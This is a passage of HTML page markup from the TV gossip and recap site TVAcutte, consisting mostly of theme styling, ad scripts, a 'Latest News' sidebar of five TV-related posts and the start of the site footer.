<style scoped="">.tdi_30{vertical-align:baseline}.tdi_30>.wpb_wrapper,.tdi_30>.wpb_wrapper>.tdc-elements{display:block}.tdi_30>.wpb_wrapper>.tdc-elements{width:100%}.tdi_30>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_30>.wpb_wrapper{width:auto;height:auto}</style><div class="wpb_wrapper" data-sticky-offset="20" data-sticky-is-width-auto="W2ZhbHNlLGZhbHNlLGZhbHNlLGZhbHNlXQ=="><div class="td_block_wrap td_block_21 tdi_31 td_with_ajax_pagination td-pb-border-top td_block_template_8 td-column-1" data-td-block-uid="tdi_31">
<style>.tdi_31 .td-block-title>*{color:#f91153!important}.tdi_31 .td-block-title>*:before,.tdi_31 .td-block-title>*:after{background-color:#fb4c7d!important}@media (max-width:767px){.tdi_31{margin-bottom:40px!important}}</style>
<style>.tdi_31 .td-block-title a,.tdi_31 .td-block-title span{font-family:Rubik!important;font-size:17px!important;font-weight:500!important;text-transform:uppercase!important}.tdi_31 .td-load-more-wrap a{font-family:Rubik!important}.tdi_31 .td_module_16 .entry-title{font-family:Rubik!important}@media (min-width:768px) and (max-width:1018px){.tdi_31 .td-block-title a,.tdi_31 .td-block-title span{font-size:15px!important}}</style><script>var block_tdi_31 = new tdBlock();
block_tdi_31.id = "tdi_31";
block_tdi_31.atts = '{"modules_on_row":"eyJwaG9uZSI6IjEwMCUifQ==","image_floated":"float_left","image_width":"30","image_height":"100","show_btn":"none","show_excerpt":"none","modules_category":"above","show_date":"none","show_review":"none","show_com":"none","show_author":"none","meta_padding":"eyJhbGwiOiIwIDAgMCAxNXB4IiwicG9ydHJhaXQiOiIwIDAgMCAxMHB4In0=","art_title":"eyJhbGwiOiI4cHggMCAwIDAiLCJwb3J0cmFpdCI6IjVweCAwIDAgMCJ9","f_title_font_family":"712","f_title_font_size":"eyJhbGwiOiIxNSIsInBvcnRyYWl0IjoiMTEifQ==","f_title_font_weight":"500","f_title_font_line_height":"1.2","title_txt":"#000000","cat_bg":"rgba(255,255,255,0)","cat_bg_hover":"rgba(255,255,255,0)","f_cat_font_family":"712","f_cat_font_transform":"uppercase","f_cat_font_weight":"400","f_cat_font_size":"11","modules_category_padding":"0","all_modules_space":"eyJhbGwiOiIyNCIsInBvcnRyYWl0IjoiMTUiLCJsYW5kc2NhcGUiOiIyMCJ9","category_id":"","ajax_pagination":"load_more","sort":"","title_txt_hover":"#008d7f","tdc_css":"eyJwaG9uZSI6eyJtYXJnaW4tYm90dG9tIjoiNDAiLCJkaXNwbGF5IjoiIn0sInBob25lX21heF93aWR0aCI6NzY3LCJhbGwiOnsiZGlzcGxheSI6IiJ9LCJwb3J0cmFpdCI6eyJkaXNwbGF5IjoiIn0sInBvcnRyYWl0X21heF93aWR0aCI6MTAxOCwicG9ydHJhaXRfbWluX3dpZHRoIjo3Njh9","cat_txt":"#000000","cat_txt_hover":"#008d7f","f_more_font_weight":"","f_more_font_transform":"","f_more_font_family":"712","image_size":"td_150x0","f_meta_font_family":"712","custom_title":"Latest News","block_template_id":"td_block_template_8","border_color":"#fb4c7d","art_excerpt":"0","meta_info_align":"center","f_cat_font_line_height":"1","pag_h_bg":"#008d7f","image_radius":"100%","td_ajax_filter_type":"","f_header_font_size":"eyJhbGwiOiIxNyIsInBvcnRyYWl0IjoiMTUifQ==","f_header_font_weight":"500","f_header_font_transform":"uppercase","f_header_font_family":"712","pag_h_border":"#008d7f","m16f_title_font_family":"712","header_text_color":"#f91153","block_type":"td_block_21","separator":"","custom_url":"","m16_tl":"","m16_el":"","post_ids":"-75891","taxonomies":"","category_ids":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","popular_by_date":"","linked_posts":"","favourite_only":"","limit":"5","offset":"","open_in_new_window":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","el_class":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","td_ajax_preloading":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_spacing":"","f_more_":"","m16f_title_font_header":"","m16f_title_font_title":"Article title","m16f_title_font_settings":"","m16f_title_font_size":"","m16f_title_font_line_height":"","m16f_title_font_style":"","m16f_title_font_weight":"","m16f_title_font_transform":"","m16f_title_font_spacing":"","m16f_title_":"","m16f_cat_font_title":"Article category tag","m16f_cat_font_settings":"","m16f_cat_font_family":"","m16f_cat_font_size":"","m16f_cat_font_line_height":"","m16f_cat_font_style":"","m16f_cat_font_weight":"","m16f_cat_font_transform":"","m16f_cat_font_spacing":"","m16f_cat_":"","m16f_meta_font_title":"Article meta info","m16f_meta_font_settings":"","m16f_meta_font_family":"","m16f_meta_font_size":"","m16f_meta_font_line_height":"","m16f_meta_font_style":"","m16f_meta_font_weight":"","m16f_meta_font_transform":"","m16f_meta_font_spacing":"","m16f_meta_":"","m16f_ex_font_title":"Article excerpt","m16f_ex_font_settings":"","m16f_ex_font_family":"","m16f_ex_font_size":"","m16f_ex_font_line_height":"","m16f_ex_font_style":"","m16f_ex_font_weight":"","m16f_ex_font_transform":"","m16f_ex_font_spacing":"","m16f_ex_":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":1,"header_color":"","color_preset":"","border_top":"","class":"tdi_31","tdc_css_class":"tdi_31","tdc_css_class_style":"tdi_31_rand_style"}';
block_tdi_31.td_column_number = "1";
block_tdi_31.block_type = "td_block_21";
block_tdi_31.post_count = "5";
block_tdi_31.found_posts = "10360";
block_tdi_31.header_color = "";
block_tdi_31.ajax_pagination_infinite_stop = "";
block_tdi_31.max_num_pages = "2072";
tdBlocksArray.push(block_tdi_31);
</script><div class="td-block-title-wrap"><h4 class="td-block-title"><span>Latest News</span></h4></div><div id="tdi_31" class="td_block_inner">
<div class="td_module_16 td_module_wrap td-animation-stack">
<div class="td-module-thumb"><a href="https://www.tvacute.com/unprisoned-season-3/" rel="bookmark" class="td-image-wrap " title="Will there be UnPrisoned Season 3 On Hulu?"><img class="entry-thumb td-animation-stack-type0-2" src="https://www.tvacute.com/wp-content/uploads/2024/09/UnPrisoned-season-3-1-150x150.avif" alt="UnPrisoned season 3" title="Will there be UnPrisoned Season 3 On Hulu?" data-type="image_tag" data-img-url="https://www.tvacute.com/wp-content/uploads/2024/09/UnPrisoned-season-3-1-150x150.avif" width="150" height="150"></a></div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://www.tvacute.com/unprisoned-season-3/" rel="bookmark follow" title="Will there be UnPrisoned Season 3 On Hulu?" data-wpel-link="internal" target="_self">Will there be UnPrisoned Season 3 On Hulu?</a></h3>
<div class="td-module-meta-info">
<span class="td-post-author-name"><a href="https://www.tvacute.com/author/admin188/" data-wpel-link="internal" target="_self" rel="follow">Olivia Wilson</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-09-28T14:57:35+00:00">September 28, 2024</time></span> <span class="td-module-comments"><a href="https://www.tvacute.com/unprisoned-season-3/#respond" data-wpel-link="internal" target="_self" rel="follow">0</a></span> </div>
<div class="td-excerpt">
Fans have been enthralled by Hulu's popular series Unprisoned because of its unique blend of comedy and drama, which centers on the complicated familial... </div>
</div>
</div>
<div class="td_module_16 td_module_wrap td-animation-stack">
<div class="td-module-thumb"><a href="https://www.tvacute.com/kendy-howard-kids-brooke-wilkins-and-wyatt-howard/" rel="bookmark" class="td-image-wrap " title="Kendy Howard’s Kids: Where Are Brooke Wilkins and Wyatt Howard?"><img class="entry-thumb td-animation-stack-type0-2" src="https://www.tvacute.com/wp-content/uploads/2024/09/Brooke-Wilkins-and-Wyatt-Howard-150x150.avif" alt="" title="Kendy Howard’s Kids: Where Are Brooke Wilkins and Wyatt Howard?" data-type="image_tag" data-img-url="https://www.tvacute.com/wp-content/uploads/2024/09/Brooke-Wilkins-and-Wyatt-Howard-150x150.avif" width="150" height="150"></a></div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://www.tvacute.com/kendy-howard-kids-brooke-wilkins-and-wyatt-howard/" rel="bookmark follow" title="Kendy Howard’s Kids: Where Are Brooke Wilkins and Wyatt Howard?" data-wpel-link="internal" target="_self">Kendy Howard’s Kids: Where Are Brooke Wilkins and Wyatt Howard?</a></h3>
<div class="td-module-meta-info">
<span class="td-post-author-name"><a href="https://www.tvacute.com/author/admin188/" data-wpel-link="internal" target="_self" rel="follow">Olivia Wilson</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-09-28T13:54:50+00:00">September 28, 2024</time></span> <span class="td-module-comments"><a href="https://www.tvacute.com/kendy-howard-kids-brooke-wilkins-and-wyatt-howard/#respond" data-wpel-link="internal" target="_self" rel="follow">0</a></span> </div>
<div class="td-excerpt">
The Bathtub Murder of Kendy Howard, an intense episode of CBS's 48 Hours delves into the mysterious and tragic murder of Kendy Howard -... </div>
</div>
</div>
<div class="td_module_16 td_module_wrap td-animation-stack">
<div class="td-module-thumb"><a href="https://www.tvacute.com/alice-the-mad-hatter/" rel="bookmark" class="td-image-wrap " title="ALICE &amp; THE MAD HATTER NOW IN PRODUCTION"><img class="entry-thumb td-animation-stack-type0-2" src="https://www.tvacute.com/wp-content/uploads/2024/09/ALICE-MAD-HATTER-150x150.avif" alt="ALICE &amp; THE MAD HATTER" title="ALICE &amp; THE MAD HATTER NOW IN PRODUCTION" data-type="image_tag" data-img-url="https://www.tvacute.com/wp-content/uploads/2024/09/ALICE-MAD-HATTER-150x150.avif" width="150" height="150"></a></div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://www.tvacute.com/alice-the-mad-hatter/" rel="bookmark follow" title="ALICE &amp; THE MAD HATTER NOW IN PRODUCTION" data-wpel-link="internal" target="_self">ALICE &amp; THE MAD HATTER NOW IN PRODUCTION</a></h3>
<div class="td-module-meta-info">
<span class="td-post-author-name"><a href="https://www.tvacute.com/author/admin188/" data-wpel-link="internal" target="_self" rel="follow">Olivia Wilson</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-09-28T06:03:19+00:00">September 28, 2024</time></span> <span class="td-module-comments"><a href="https://www.tvacute.com/alice-the-mad-hatter/#respond" data-wpel-link="internal" target="_self" rel="follow">0</a></span> </div>
<div class="td-excerpt">
The creators of Winnie-the-Pooh: Blood and Honey are extending their Horror Universe with a terrifying reimagining of Alice in Wonderland. The upcoming Peter Pan's... </div>
</div>
</div>
<div class="td_module_16 td_module_wrap td-animation-stack">
<div class="td-module-thumb"><a href="https://www.tvacute.com/how-to-die-alone-season-1-episode-8-recap/" rel="bookmark" class="td-image-wrap " title="[Season Finale] How to Die Alone Season 1 Episode 8 Recap: “Get Lost”"><img class="entry-thumb td-animation-stack-type0-2" src="https://www.tvacute.com/wp-content/uploads/2024/09/How-to-Die-Alone-eps-8-recap-150x150.avif" alt="How to Die Alone eps 8 recap" title="[Season Finale] How to Die Alone Season 1 Episode 8 Recap: “Get Lost”" data-type="image_tag" data-img-url="https://www.tvacute.com/wp-content/uploads/2024/09/How-to-Die-Alone-eps-8-recap-150x150.avif" width="150" height="150"></a></div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://www.tvacute.com/how-to-die-alone-season-1-episode-8-recap/" rel="bookmark follow" title="[Season Finale] How to Die Alone Season 1 Episode 8 Recap: “Get Lost”" data-wpel-link="internal" target="_self">[Season Finale] How to Die Alone Season 1 Episode 8 Recap: “Get Lost”</a></h3>
<div class="td-module-meta-info">
<span class="td-post-author-name"><a href="https://www.tvacute.com/author/admin188/" data-wpel-link="internal" target="_self" rel="follow">Olivia Wilson</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-09-28T05:30:26+00:00">September 28, 2024</time></span> <span class="td-module-comments"><a href="https://www.tvacute.com/how-to-die-alone-season-1-episode-8-recap/#respond" data-wpel-link="internal" target="_self" rel="follow">0</a></span> </div>
<div class="td-excerpt">
In a vulnerable moment, Melissa failed to confess her love to Alex at the end of How to Die Alone episode 7, and she... </div>
</div>
</div>
<div class="td_module_16 td_module_wrap td-animation-stack">
<div class="td-module-thumb"><a href="https://www.tvacute.com/how-to-die-alone-season-1-episode-7-recap/" rel="bookmark" class="td-image-wrap " title="How to Die Alone Season 1 Episode 7 Recap: Kill Your Darlings"><img class="entry-thumb td-animation-stack-type0-2" src="https://www.tvacute.com/wp-content/uploads/2024/09/How-to-Die-Alone-eps-7-recap-150x150.avif" alt="How to Die Alone eps 7 recap" title="How to Die Alone Season 1 Episode 7 Recap: Kill Your Darlings" data-type="image_tag" data-img-url="https://www.tvacute.com/wp-content/uploads/2024/09/How-to-Die-Alone-eps-7-recap-150x150.avif" width="150" height="150"></a></div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://www.tvacute.com/how-to-die-alone-season-1-episode-7-recap/" rel="bookmark follow" title="How to Die Alone Season 1 Episode 7 Recap: Kill Your Darlings" data-wpel-link="internal" target="_self">How to Die Alone Season 1 Episode 7 Recap: Kill Your Darlings</a></h3>
<div class="td-module-meta-info">
<span class="td-post-author-name"><a href="https://www.tvacute.com/author/admin188/" data-wpel-link="internal" target="_self" rel="follow">Olivia Wilson</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-09-28T05:19:52+00:00">September 28, 2024</time></span> <span class="td-module-comments"><a href="https://www.tvacute.com/how-to-die-alone-season-1-episode-7-recap/#respond" data-wpel-link="internal" target="_self" rel="follow">0</a></span> </div>
<div class="td-excerpt">
Creator Natasha Rothwell, who also plays Melissa, the lead character, How to Die Alone is an American comedy series. Melissa, a middle-aged Black employee... </div>
</div>
</div>
</div><div class="td-load-more-wrap"><a href="#" class="td_ajax_load_more td_ajax_load_more_js" aria-label="Load more" id="next-page-tdi_31" data-td_block_id="tdi_31">Load more<i class="td-load-more-icon td-icon-font td-icon-menu-right"></i></a></div></div> <div class="td-block td-a-rec td-a-rec-id-custom-spot tdi_32 td_block_template_1">
<style>.tdi_32.td-a-rec{text-align:center}.tdi_32.td-a-rec:not(.td-a-rec-no-translate){transform:translateZ(0)}.tdi_32 .td-element-style{z-index:-1}</style><script type="rocketlazyloadscript" async="" data-rocket-src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-8058393775546814" crossorigin="anonymous"></script>

<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-8058393775546814" data-ad-slot="7500513086"></ins>
<script type="rocketlazyloadscript">
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div><div class="td-block td-a-rec td-a-rec-id-custom-spot tdi_33 td_block_template_1">
<style>.tdi_33.td-a-rec{text-align:center}.tdi_33.td-a-rec:not(.td-a-rec-no-translate){transform:translateZ(0)}.tdi_33 .td-element-style{z-index:-1}</style><div id="hbagency_space_10855"></div>

<div class="ads_container" website_id="2289" widget_id="6040"></div><script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://www.tvacute.com/wp-content/cache/min/1/scripts/widget/widget_v3.js?ver=1726249638" async=""></script>
</div></div></div></div></div><div id="tdi_34" class="tdc-row"><div class="vc_row tdi_35  wpb_row td-pb-row">
<style scoped="">.tdi_35,.tdi_35 .tdc-columns{min-height:0}.tdi_35,.tdi_35 .tdc-columns{display:block}.tdi_35 .tdc-columns{width:100%}</style><div class="vc_column tdi_37  wpb_column vc_column_container tdc-column td-pb-span12">
<style scoped="">.tdi_37{vertical-align:baseline}.tdi_37>.wpb_wrapper,.tdi_37>.wpb_wrapper>.tdc-elements{display:block}.tdi_37>.wpb_wrapper>.tdc-elements{width:100%}.tdi_37>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_37>.wpb_wrapper{width:auto;height:auto}</style><div class="wpb_wrapper"></div></div></div></div></div></div> <span class="td-page-meta" itemprop="author" itemscope="" itemtype="https://schema.org/Person"><meta itemprop="name" content="Olivia Wilson"><meta itemprop="url" content="https://www.tvacute.com/author/admin188/"></span><meta itemprop="datePublished" content="2024-09-29T06:56:36+00:00"><meta itemprop="dateModified" content="2024-09-29T06:56:36+00:00"><meta itemscope="" itemprop="mainEntityOfPage" itemtype="https://schema.org/WebPage" itemid="https://www.tvacute.com/from-season-3-episode-2-recap/"><span class="td-page-meta" itemprop="publisher" itemscope="" itemtype="https://schema.org/Organization"><span class="td-page-meta" itemprop="logo" itemscope="" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/tvacutte-H90.png&amp;nocache=1"></span><meta itemprop="name" content="TV Acutte - TV Recaps &amp; Reviews"></span><meta itemprop="headline" content="From Season 3 Episode 2 Recap and Ending Explained!"><span class="td-page-meta" itemprop="image" itemscope="" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go.avif"><meta itemprop="width" content="640"><meta itemprop="height" content="360"></span> </article>
</div>
</div>
</div> 

<div class="td-footer-template-wrap" style="position: relative">
<div class="td-footer-wrap ">
<div id="tdi_38" class="tdc-zone"><div class="tdc_zone tdi_39  wpb_row td-pb-row tdc-element-style">
<style scoped="">.tdi_39{min-height:0}.tdi_39{position:relative}</style>
<div class="tdi_38_rand_style td-element-style"><style>.tdi_38_rand_style{background-color:#111111!important}</style></div><div id="tdi_40" class="tdc-row"><div class="vc_row tdi_41  wpb_row td-pb-row tdc-element-style">
<style scoped="">.tdi_41,.tdi_41 .tdc-columns{min-height:0}.tdi_41,.tdi_41 .tdc-columns{display:flex;flex-direction:row;flex-wrap:nowrap;justify-content:flex-start;align-items:stretch}.tdi_41 .tdc-columns{width:100%}@media (min-width:768px){.tdi_41{margin-left:-15px;margin-right:-15px}.tdi_41 .tdc-row-video-background-error,.tdi_41>.vc_column,.tdi_41>.tdc-columns>.vc_column{padding-left:15px;padding-right:15px}}@media (min-width:1019px) and (max-width:1140px){@media (min-width:768px){.tdi_41{margin-left:-10px;margin-right:-10px}.tdi_41 .tdc-row-video-background-error,.tdi_41>.vc_column,.tdi_41>.tdc-columns>.vc_column{padding-left:10px;padding-right:10px}}}@media (min-width:768px) and (max-width:1018px){@media (min-width:768px){.tdi_41{margin-left:-10px;margin-right:-10px}.tdi_41 .tdc-row-video-background-error,.tdi_41>.vc_column,.tdi_41>.tdc-columns>.vc_column{padding-left:10px;padding-right:10px}}}@media (max-width:767px){.tdi_41,.tdi_41 .tdc-columns{flex-direction:column}}.tdi_41{margin-right:0px!important;margin-bottom:15px!important;margin-left:0px!important;padding-top:45px!important;padding-bottom:13px!important;border-style:solid!important;border-color:#888888!important;border-width:0px 0px 1px 0px!important;position:relative}.tdi_41 .td_block_wrap{text-align:left}@media (min-width:768px) and (max-width:1018px){.tdi_41{margin-bottom:10px!important;padding-top:25px!important;padding-bottom:10px!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_41{margin-bottom:10px!important;padding-top:35px!important;padding-bottom:10px!important}}@media (max-width:767px){.tdi_41{padding-top:25px!important}}</style>
<div class="tdi_40_rand_style td-element-style"><style>.tdi_40_rand_style{background-color:#111111!important}</style></div><div class="vc_column tdi_43  wpb_column vc_column_container tdc-column td-pb-span4">
<style scoped="">.tdi_43{vertical-align:baseline}.tdi_43>.wpb_wrapper,.tdi_43>.wpb_wrapper>.tdc-elements{display:block}.tdi_43>.wpb_wrapper>.tdc-elements{width:100%}.tdi_43>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_43>.wpb_wrapper{width:auto;height:auto}.tdi_43{padding-left:0px!important;border-color:var(--today-news-white-transparent2)!important;border-style:solid!important;border-width:0px 1px 0px 0px!important}@media (max-width:767px){.tdi_43{margin-bottom:15px!important;padding-bottom:15px!important;border-width:0px 0px 1px 0px!important}}</style><div class="wpb_wrapper"><div class=" td-animation-stack td_block_wrap tdb_header_logo tdi_44 td-pb-border-top td_block_template_1 tdb-header-align" data-td-block-uid="tdi_44">
<style>.tdi_44{margin-top:-4px!important;margin-bottom:12px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_44{margin-bottom:10px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_44{margin-bottom:8px!important}}@media (max-width:767px){.tdi_44{margin-bottom:8px!important}}</style>
<style>.tdb-header-align{vertical-align:middle}.tdb_header_logo{margin-bottom:0;clear:none}.tdb_header_logo .tdb-logo-a,.tdb_header_logo h1{display:flex;pointer-events:auto;align-items:flex-start}.tdb_header_logo h1{margin:0;line-height:0}.tdb_header_logo .tdb-logo-img-wrap img{display:block}.tdb_header_logo .tdb-logo-svg-wrap+.tdb-logo-img-wrap{display:none}.tdb_header_logo .tdb-logo-svg-wrap svg{width:50px;display:block;transition:fill .3s ease}.tdb_header_logo .tdb-logo-text-wrap{display:flex}.tdb_header_logo .tdb-logo-text-title,.tdb_header_logo .tdb-logo-text-tagline{-webkit-transition:all 0.2s ease;transition:all 0.2s ease}.tdb_header_logo .tdb-logo-text-title{background-size:cover;background-position:center center;font-size:75px;font-family:serif;line-height:1.1;color:#222;white-space:nowrap}.tdb_header_logo .tdb-logo-text-tagline{margin-top:2px;font-size:12px;font-family:serif;letter-spacing:1.8px;line-height:1;color:#767676}.tdb_header_logo .tdb-logo-icon{position:relative;font-size:46px;color:#000}.tdb_header_logo .tdb-logo-icon-svg{line-height:0}.tdb_header_logo .tdb-logo-icon-svg svg{width:46px;height:auto}.tdb_header_logo .tdb-logo-icon-svg svg,.tdb_header_logo .tdb-logo-icon-svg svg *{fill:#000}.tdi_44 .tdb-logo-a,.tdi_44 h1{flex-direction:row;align-items:center;justify-content:flex-start}.tdi_44 .tdb-logo-svg-wrap{display:block}.tdi_44 .tdb-logo-svg-wrap+.tdb-logo-img-wrap{display:none}.tdi_44 .tdb-logo-text-tagline{margin-top:2px;margin-left:0;display:none}.tdi_44 .tdb-logo-text-title{display:none;color:var(--today-news-white);font-family:Rubik!important;font-size:28px!important;line-height:1.3!important;font-weight:700!important;letter-spacing:-2px!important;}.tdi_44 .tdb-logo-text-wrap{flex-direction:column;align-items:flex-start}.tdi_44 .tdb-logo-icon{top:0px;display:none}@media (max-width:767px){.tdb_header_logo .tdb-logo-text-title{font-size:36px}}@media (max-width:767px){.tdb_header_logo .tdb-logo-text-tagline{font-size:11px}}@media (min-width:1019px) and (max-width:1140px){.tdi_44 .tdb-logo-text-title{font-size:24px!important;}}@media (min-width:768px) and (max-width:1018px){.tdi_44 .tdb-logo-text-title{font-size:20px!important;}}@media (max-width:767px){.tdi_44 .tdb-logo-text-title{font-size:24px!important;}}</style><div class="tdb-block-inner td-fix-index"><a class="tdb-logo-a" href="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/TVAcutte-Footer-Pink55.png&amp;nocache=1" data-wpel-link="internal" target="_self" rel="follow"><span class="tdb-logo-img-wrap"><img class="tdb-logo-img td-retina-data td-animation-stack-type0-1" data-retina="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/TVAcutte-Footer-Pink55.png&amp;nocache=1" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20728%20140'%3E%3C/svg%3E" alt="Logo" title="" width="728" height="140" data-lazy-src="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/TVAcutte-Footer-Pink55.png&amp;nocache=1"><noscript><img class="tdb-logo-img td-retina-data" data-retina="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/TVAcutte-Footer-Pink55.png&amp;nocache=1" src="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/TVAcutte-Footer-Pink55.png&amp;nocache=1" alt="Logo"  title=""  width="728" height="140" /></noscript></span><span class="tdb-logo-text-wrap"><span class="tdb-logo-text-title">TVAcutte</span><span class="tdb-logo-text-tagline">TV News &amp; Movies Gossip</span></span></a></div></div> <div class="tdm_block td_block_wrap tdm_block_inline_text tdi_45 td-pb-border-top td_block_template_1" data-td-block-uid="tdi_45">
<style>.tdi_45{margin-bottom:10px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_45{margin-bottom:8px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_45{margin-bottom:6px!important}}@media (max-width:767px){.tdi_45{margin-bottom:6px!important}}</style>
<style>.tdm_block.tdm_block_inline_text{margin-bottom:0;vertical-align:top}.tdm_block.tdm_block_inline_text .tdm-descr{margin-bottom:0;-webkit-transform:translateZ(0);transform:translateZ(0)}.tdc-row-content-vert-center .tdm-inline-text-yes{vertical-align:middle}.tdc-row-content-vert-bottom .tdm-inline-text-yes{vertical-align:bottom}.tdi_45{text-align:left!important}.tdi_45 .tdm-descr{color:var(--today-news-light-gray);font-family:Rubik!important;font-size:15px!important;line-height:1.4!important}@media (min-width:1019px) and (max-width:1140px){.tdi_45 .tdm-descr{font-size:12px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_45 .tdm-descr{font-size:11px!important;line-height:1.25!important}}@media (max-width:767px){.tdi_45 .tdm-descr{font-size:12px!important}}</style><p class="tdm-descr">TV Acutte is a full entertainment site where you find tv series related press releases , promotional photos tv news and movie updates.</p></div></div></div><div class="vc_column tdi_47  wpb_column vc_column_container tdc-column td-pb-span4">
<style scoped="">.tdi_47{vertical-align:baseline}.tdi_47>.wpb_wrapper,.tdi_47>.wpb_wrapper>.tdc-elements{display:block}.tdi_47>.wpb_wrapper>.tdc-elements{width:100%}.tdi_47>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_47>.wpb_wrapper{width:auto;height:auto}.tdi_47{border-color:var(--today-news-white-transparent2)!important;border-style:solid!important;border-width:0px 1px 0px 0px!important}@media (max-width:767px){.tdi_47{margin-bottom:15px!important;padding-bottom:15px!important;border-width:0px 0px 1px 0px!important}}</style><div class="wpb_wrapper"><div class="td_block_wrap td_block_list_menu tdi_48 td-blm-display-vertical td-pb-border-top td_block_template_1 widget" data-td-block-uid="tdi_48">
<style>.tdi_48{margin-bottom:0px!important}</style>
<style>.td_block_list_menu ul{flex-wrap:wrap;margin-left:12px}.td_block_list_menu ul li{margin-left:0}.td_block_list_menu ul li a{display:flex;margin-left:0}.td_block_list_menu .td-blm-menu-item-txt{display:flex;align-items:center;flex-grow:1}.td_block_list_menu .sub-menu{padding-left:22px}.td_block_list_menu .sub-menu li{font-size:13px}.td_block_list_menu li.current-menu-item>a,.td_block_list_menu li.current-menu-ancestor>a,.td_block_list_menu li.current-category-ancestor>a,.td_block_list_menu li.current-page-ancestor>a{color:var(--td_theme_color,#4db2ec)}.td_block_list_menu .td-blm-sub-icon{display:flex;align-items:center;justify-content:center;margin-left:.6em;padding:0 .6em;transition:transform .2s ease-in-out}.td_block_list_menu .td-blm-sub-icon svg{display:block;width:1em;height:auto}.td_block_list_menu .td-blm-sub-icon svg,.td_block_list_menu .td-blm-sub-icon svg *{fill:currentColor}.td_block_list_menu.td-blm-display-accordion .menu-item-has-children ul{display:none}.td_block_list_menu.td-blm-display-accordion .menu-item-has-children-open>a>.td-blm-sub-icon{transform:rotate(180deg)}.td_block_list_menu.td-blm-display-horizontal ul{display:flex}body .tdi_48 ul{text-align:left;justify-content:flex-start;margin:0px}body .tdi_48 ul li a{justify-content:flex-start}body .tdi_48 .td-blm-menu-item-txt{flex-grow:1}body .tdi_48 ul li{margin-bottom:10px}body .tdi_48 ul li:last-child{margin-bottom:0}body .tdi_48 a,body .tdi_48 .td-blm-sub-icon{color:var(--today-news-white)}body .tdi_48 li.current-menu-item>a,body .tdi_48 li.current-menu-ancestor>a,body .tdi_48 li.current-category-ancestor>a,body .tdi_48 li.current-page-ancestor>a,body .tdi_48 a:hover,body .tdi_48 li.current-menu-item>a>.td-blm-sub-icon,body .tdi_48 li.current-menu-ancestor>a>.td-blm-sub-icon,body .tdi_48 li.current-category-ancestor>a>.td-blm-sub-icon,body .tdi_48 li.current-page-ancestor>a>.td-blm-sub-icon,body .tdi_48 a:hover>.td-blm-sub-icon{color:var(--today-news-accent)}body .tdi_48 li{font-family:Rubik!important;font-size:14px!important;line-height:1.3!important;font-weight:700!important;text-transform:uppercase!important;letter-spacing:-0.3px!important}@media (min-width:1019px) and (max-width:1140px){body .tdi_48 ul li{margin-bottom:8px}body .tdi_48 ul li:last-child{margin-bottom:0}body .tdi_48 li{font-size:13px!important}}@media (min-width:768px) and (max-width:1018px){body .tdi_48 ul li{margin-bottom:7px}body .tdi_48 ul li:last-child{margin-bottom:0}body .tdi_48 li{font-size:12px!important;line-height:1.25!important}}@media (max-width:767px){body .tdi_48 ul li{margin-bottom:8px}body .tdi_48 ul li:last-child{margin-bottom:0}body .tdi_48 li{font-size:13px!important}}</style><div class="td-block-title-wrap"><h4 class="block-title td-block-title"><span class="td-pulldown-size">Important Pages</span></h4></div><div id="tdi_48" class="td_block_inner td-fix-index"><div class="menu-footer-menu-container"><ul id="menu-footer-menu" class="menu"><li id="menu-item-55200" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55200"><a href="https://www.tvacute.com/about-us/" data-wpel-link="internal" target="_self" 